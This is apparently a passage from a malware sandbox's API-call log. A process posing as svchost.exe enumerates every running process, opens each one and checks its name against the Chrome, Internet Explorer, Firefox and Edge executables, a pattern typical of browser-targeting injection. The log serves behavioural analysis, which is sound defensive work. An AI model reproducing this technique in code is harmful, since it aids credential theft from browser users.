	[0196.681] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.681] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.682] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.682] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.682] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.683] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0196.683] CloseHandle (hObject=0x188) returned 1
	[0196.683] Sleep (dwMilliseconds=0x64) 
	[0196.787] GetCurrentProcessId () returned 0x110
	[0196.787] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0196.789] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0196.790] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0196.790] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0196.791] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x1260
	[0196.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.791] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0196.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.792] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.792] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0196.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.792] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.792] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0196.793] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x1264
	[0196.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.793] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0196.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.793] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.794] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0196.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.794] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.794] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0196.795] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x1268
	[0196.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.795] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0196.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.795] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.796] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0196.796] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.796] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.796] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0196.797] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x126c
	[0196.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.797] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0196.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.797] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.797] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0196.798] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.798] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.798] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0196.798] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x1270
	[0196.799] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.799] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0196.799] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.799] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.799] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.799] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0196.799] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.800] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.800] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0196.800] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1274
	[0196.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.801] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0196.801] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.801] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.801] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.801] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0196.801] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.802] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.802] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0196.802] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1278
	[0196.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.802] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0196.803] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.803] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.803] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.803] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0196.803] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.803] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.803] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0196.804] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x127c
	[0196.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.804] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0196.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.804] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.805] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.805] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0196.805] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.805] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.805] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.806] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x1280
	[0196.806] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.806] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.806] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.806] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.806] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.807] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.807] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.807] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.807] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.808] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x1284
	[0196.808] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.808] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.808] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.808] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.808] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.808] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.809] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.809] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.809] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.810] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x1288
	[0196.810] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.810] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.810] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.810] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.810] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.810] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.811] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.811] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.811] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.811] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x128c
	[0196.812] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.812] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.812] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.812] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.812] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.812] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.813] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.813] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.813] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.813] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x1290
	[0196.813] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.814] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.814] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.814] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.814] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.814] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.814] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.814] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.815] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.815] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x1294
	[0196.815] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.815] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.816] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.816] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.816] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.816] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.816] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.816] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.817] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.817] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x1298
	[0196.817] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.817] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.818] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.818] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.818] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.818] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.818] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.818] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.819] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0196.819] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x129c
	[0196.819] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.819] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0196.820] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.820] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.820] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.820] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0196.820] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.820] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.820] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.821] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x12a0
	[0196.821] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.821] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.822] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.822] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.822] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.822] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.822] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.822] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.822] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0196.823] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x12a4
	[0196.823] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.823] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.824] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.824] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.824] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.824] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.824] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.824] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.824] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0196.825] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x12a8
	[0196.825] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.825] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0196.826] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.843] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.843] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.843] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0196.844] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.844] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.844] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.845] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x12ac
	[0196.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.845] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.845] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.845] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.846] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.846] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.846] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0196.847] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x12b0
	[0196.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.847] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0196.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.847] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.848] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0196.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.848] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.848] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0196.849] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x12b4
	[0196.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.849] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0196.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.849] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.849] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0196.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.850] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.850] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0196.851] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x12b8
	[0196.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.851] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0196.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.851] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.851] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0196.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.851] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
